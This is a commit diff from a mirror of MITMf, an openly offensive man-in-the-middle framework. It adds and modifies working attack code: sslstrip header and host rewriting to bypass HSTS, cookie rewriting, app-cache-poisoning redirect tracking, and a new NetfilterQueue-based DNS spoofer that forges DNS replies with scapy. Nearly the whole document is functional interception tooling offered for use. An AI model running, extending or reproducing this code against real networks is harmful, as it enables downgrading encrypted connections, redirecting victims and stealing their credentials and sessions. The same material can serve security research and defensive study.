github/MITMf
1
0
Fork 0
mirror of https://github.com/byt3bl33d3r/MITMf.git synced 2025-08-14 10:47:05 -07:00
Code Issues Projects Releases Packages Wiki Activity Actions

Merge branch 'master' of github.com:byt3bl33d3r/MITMf into v0.9.6

Browse source
This commit is contained in:
byt3bl33d3r 2015-04-10 15:57:17 +02:00
commit eb7e797ded
20 changed files with 230 additions and 247 deletions
Download patch file Download diff file Expand all files Collapse all files

74
core/sslstrip/ClientRequest.py
View file

@ -59,20 +59,8 @@ class ClientRequest(Request):
#for k,v in headers.iteritems():
# logging.debug("[ClientRequest] Receiving headers: (%s => %s)" % (k, v))
if 'accept-encoding' in headers:
headers['accept-encoding'] == 'identity'
logging.debug("Zapped encoding")
if 'if-modified-since' in headers:
del headers['if-modified-since']
if 'cache-control' in headers:
del headers['cache-control']
if self.hsts:
if 'if-none-match' in headers:
del headers['if-none-match']
if 'referer' in headers:
real = self.urlMonitor.real
@ -80,15 +68,24 @@ class ClientRequest(Request):
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
headers['referer'] = dregex.sub(lambda x: str(real[x.string[x.start() :x.end()]]), headers['referer'])
if 'if-none-match' in headers:
del headers['if-none-match']
if 'host' in headers:
host = self.urlMonitor.URLgetRealHost(headers['host'])
if host[1] is True:
logging.debug("[ClientRequest][HSTS] Modifing HOST header: %s -> %s" % (headers['host'],host[0]))
headers['host'] = host[0]
headers['securelink'] = '1'
self.setHeader('Host',host[0])
else:
logging.debug("[ClientRequest][HSTS] Passed on HOST header: %s " % headers['host'])
host = self.urlMonitor.URLgetRealHost(str(headers['host']))
logging.debug("[ClientRequest][HSTS] Modifing HOST header: %s -> %s" % (headers['host'], host))
headers['host'] = host
self.setHeader('Host', host)
if 'accept-encoding' in headers:
del headers['accept-encoding']
logging.debug("Zapped encoding")
if 'if-modified-since' in headers:
del headers['if-modified-since']
if 'cache-control' in headers:
del headers['cache-control']
self.plugins.hook()
@ -113,7 +110,7 @@ class ClientRequest(Request):
return "lock.ico"
def handleHostResolvedSuccess(self, address):
logging.debug("Resolved host successfully: %s -> %s" % (self.getHeader('host'), address))
logging.debug("[ClientRequest] Resolved host successfully: %s -> %s" % (self.getHeader('host'), address))
host = self.getHeader("host")
headers = self.cleanHeaders()
client = self.getClientIP()
@ -123,12 +120,16 @@ class ClientRequest(Request):
if self.content:
self.content.seek(0,0)
postData = self.content.read()
if self.hsts:
real = self.urlMonitor.real
host = self.urlMonitor.URLgetRealHost(str(host))
real = self.urlMonitor.real
patchDict = self.urlMonitor.patchDict
url = 'http://' + host + path
self.uri = url # set URI to absolute
if len(real) > 0:
dregex = re.compile("(%s)" % "|".join(map(re.escape, real.keys())))
@ -140,7 +141,7 @@ class ClientRequest(Request):
postData = dregex.sub(lambda x: str(patchDict[x.string[x.start() :x.end()]]), postData)
headers['content-length'] = "%d" % len(postData)
headers['content-length'] = str(len(postData))
#self.dnsCache.cacheResolution(host, address)
hostparts = host.split(':')
@ -171,7 +172,7 @@ class ClientRequest(Request):
self.proxyViaHTTP(address, self.method, path, postData, headers, port)
def handleHostResolvedError(self, error):
logging.warning("Host resolution error: " + str(error))
logging.warning("[ClientRequest] Host resolution error: " + str(error))
try:
self.finish()
except:
@ -188,26 +189,13 @@ class ClientRequest(Request):
return reactor.resolve(host)
def process(self):
logging.debug("Resolving host: %s" % (self.getHeader('host')))
host = self.getHeader('host')
logging.debug("[ClientRequest] Resolving host: %s" % (self.getHeader('host')))
host = self.getHeader('host').split(":")[0]
if (self.hsts and host):
real = self.urlMonitor.real
if 'wwww' in host:
logging.info("%s Resolving %s for HSTS bypass (Twisted)" % (self.getClientIP(), host))
host = host[1:]
elif 'web' in host:
logging.info("%s Resolving %s for HSTS bypass (Twisted)" % (self.getClientIP(), host))
host = host[3:]
elif host in real:
logging.info("%s Resolving %s for HSTS bypass (Twisted)" % (self.getClientIP(), host))
host = real[host]
hostparts = host.split(':')
#deferred = self.resolveHost(host)
deferred = self.resolveHost(hostparts[0])
if self.hsts:
host = self.urlMonitor.URLgetRealHost("%s"%host)
deferred = self.resolveHost(host)
deferred.addCallback(self.handleHostResolvedSuccess)
deferred.addErrback(self.handleHostResolvedError)

5
core/sslstrip/SSLServerConnection.py
View file

@ -19,6 +19,7 @@
import logging, re, string
from ServerConnection import ServerConnection
from URLMonitor import URLMonitor
class SSLServerConnection(ServerConnection):
@ -36,6 +37,8 @@ class SSLServerConnection(ServerConnection):
def __init__(self, command, uri, postData, headers, client):
ServerConnection.__init__(self, command, uri, postData, headers, client)
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().isHstsBypass()
def getLogLevel(self):
return logging.INFO
@ -44,7 +47,7 @@ class SSLServerConnection(ServerConnection):
return "SECURE POST"
def handleHeader(self, key, value):
if ServerConnection.isHsts(self):
if self.hsts:
if (key.lower() == 'set-cookie'):
newvalues =[]
value = SSLServerConnection.cookieExpression.sub("\g<1>", value)

9
core/sslstrip/ServerConnection.py
View file

@ -54,6 +54,7 @@ class ServerConnection(HTTPClient):
self.clientInfo = None
self.urlMonitor = URLMonitor.getInstance()
self.hsts = URLMonitor.getInstance().isHstsBypass()
self.app = URLMonitor.getInstance().isAppCachePoisoning()
self.plugins = ProxyPlugins.getInstance()
self.isImageRequest = False
self.isCompressed = False
@ -63,9 +64,6 @@ class ServerConnection(HTTPClient):
def getPostPrefix(self):
return "POST"
def isHsts(self):
return self.hsts
def sendRequest(self):
if self.command == 'GET':
try:
@ -113,7 +111,8 @@ class ServerConnection(HTTPClient):
if (key.lower() == 'location'):
value = self.replaceSecureLinks(value)
self.urlMonitor.addRedirection(self.client.uri, value)
if self.app:
self.urlMonitor.addRedirection(self.client.uri, value)
if (key.lower() == 'content-type'):
if (value.find('image') != -1):
@ -166,7 +165,7 @@ class ServerConnection(HTTPClient):
logging.debug("Decompressing content...")
data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
logging.debug("Read from server:\n" + data)
#logging.debug("Read from server:\n" + data)
data = self.replaceSecureLinks(data)
res = self.plugins.hook()

21
core/sslstrip/URLMonitor.py
View file

@ -43,6 +43,7 @@ class URLMonitor:
self.redirects = []
self.faviconReplacement = False
self.hsts = False
self.app = False
self.hsts_config = None
@staticmethod
@ -71,7 +72,7 @@ class URLMonitor:
s.add(to_url)
return
url_set = set([from_url, to_url])
logging.debug("[URLMonitor] Set redirection: %s" % url_set)
logging.debug("[URLMonitor][AppCachePoison] Set redirection: %s" % url_set)
self.redirects.append(url_set)
def getRedirectionSet(self, url):
@ -138,6 +139,9 @@ class URLMonitor:
self.sustitucion[k] = v
self.real[v] = k
def setAppCachePoisoning(self):
self.app = True
def setClientLogging(self, clientLogging):
self.clientLogging = clientLogging
@ -150,14 +154,17 @@ class URLMonitor:
def isHstsBypass(self):
return self.hsts
def isAppCachePoisoning(self):
return self.app
def isSecureFavicon(self, client, url):
return ((self.faviconSpoofing == True) and (url.find("favicon-x-favicon-x.ico") != -1))
def URLgetRealHost(self,host):
logging.debug("[URLMonitor][HSTS]Parsing host: %s"%host)
def URLgetRealHost(self, host):
logging.debug("[URLMonitor][HSTS] Parsing host: %s"% host)
if self.real.has_key(host):
logging.debug("[URLMonitor][HSTS]New host: %s"%self.real[host])
return (self.real[host], True)
logging.debug("[URLMonitor][HSTS] Found host in list: %s"% self.real[host])
return self.real[host]
else:
logging.debug("[URLMonitor][HSTS]New host: %s"%host)
return (host, False)
logging.debug("[URLMonitor][HSTS] Host not in list: %s"% host)
return host

1
core/utils.py
View file

@ -97,7 +97,6 @@ class Banners:
\/__/ \/__/ \/__/ \/__/ \/__/
"""
@property
def printBanner(self):
banners = [self.banner1, self.banner2, self.banner3, self.banner4]
print random.choice(banners)

47
core/wrappers/nfqueue.py
View file

@ -1,47 +0,0 @@
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import threading
from netfilterqueue import NetfilterQueue
class Nfqueue():
def __init__(self, queue_number):
self.queue_number = queue_number
self.nfqueue = NetfilterQueue()
def start(self):
t = threading.Thread(name='nfqueue', target=self.bind, args=())
t.setDaemon(True)
t.start()
def bind(self):
self.nfqueue.bind(self.queue_number, self.callback)
self.nfqueue.run()
def stop(self):
try:
self.nfqueue.unbind()
except:
pass
def callback(self, payload):
payload.accept()

131
core/wrappers/protocols.py
View file

@ -22,10 +22,12 @@ import logging
import threading
import binascii
import random
import dns.resolver
from base64 import b64decode
from urllib import unquote
from time import sleep
from netfilterqueue import NetfilterQueue
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
from scapy.all import *
@ -240,3 +242,132 @@ class _ICMP():
def send_icmps(self, pkt, interface, debug):
while self.send:
sendp(pkt, inter=self.icmp_interval, iface=interface, verbose=debug)
class _DNS():
hsts = False
dns = False
hstscfg = None
dnscfg = None
_instance = None
nfqueue = NetfilterQueue()
queue_number = 0
def __init__(self):
t = threading.Thread(name='nfqueue', target=self.bind, args=())
t.setDaemon(True)
t.start()
@staticmethod
def getInstance():
if _DNS._instance is None:
_DNS._instance = _DNS()
return _DNS._instance
@staticmethod
def checkInstance():
if _DNS._instance is None:
return False
else:
return True
def bind(self):
self.nfqueue.bind(self.queue_number, self.callback)
self.nfqueue.run()
def stop(self):
try:
self.nfqueue.unbind()
except:
pass
def enableHSTS(self, config):
self.hsts = True
self.hstscfg = config
def enableDNS(self, config):
self.dns = True
self.dnscfg = config
def resolve_domain(self, domain):
try:
logging.debug("Resolving -> %s" % domain)
answer = dns.resolver.query(domain, 'A')
real_ips = []
for rdata in answer:
real_ips.append(rdata.address)
if len(real_ips) > 0:
return real_ips
except Exception:
logging.info("Error resolving " + domain)
def callback(self, payload):
try:
#logging.debug(payload)
pkt = IP(payload.get_payload())
if not pkt.haslayer(DNSQR):
payload.accept()
return
if pkt.haslayer(DNSQR):
logging.debug("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype))
if self.dns:
for k, v in self.dnscfg.items():
if k in pkt[DNSQR].qname:
self.modify_dns(payload, pkt, v)
return
payload.accept()
elif self.hsts:
if (pkt[DNSQR].qtype is 28 or pkt[DNSQR].qtype is 1):
for k,v in self.hstscfg.items():
if v == pkt[DNSQR].qname[:-1]:
ip = self.resolve_domain(k)
if ip:
self.modify_dns(payload, pkt, ip)
return
if 'wwww' in pkt[DNSQR].qname:
ip = self.resolve_domain(pkt[DNSQR].qname[1:-1])
if ip:
self.modify_dns(payload, pkt, ip)
return
if 'web' in pkt[DNSQR].qname:
ip = self.resolve_domain(pkt[DNSQR].qname[3:-1])
if ip:
self.modify_dns(payload, pkt, ip)
return
payload.accept()
except Exception, e:
print "Exception occurred in nfqueue callback: " + str(e)
def modify_dns(self, payload, pkt, ip):
try:
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\
UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\
DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd)
if self.hsts:
spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip[0]); del ip[0] #have to do this first to initialize the an field
for i in ip:
spoofed_pkt[DNS].an.add_payload(DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=i))
logging.info("%s Resolving %s for HSTS bypass (DNS)" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
payload.set_payload(str(spoofed_pkt))
payload.accept()
if self.dns:
spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip)
logging.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))
payload.set_payload(str(spoofed_pkt))
payload.accept()
except Exception, e:
print "Exception occurred while modifying DNS: " + str(e)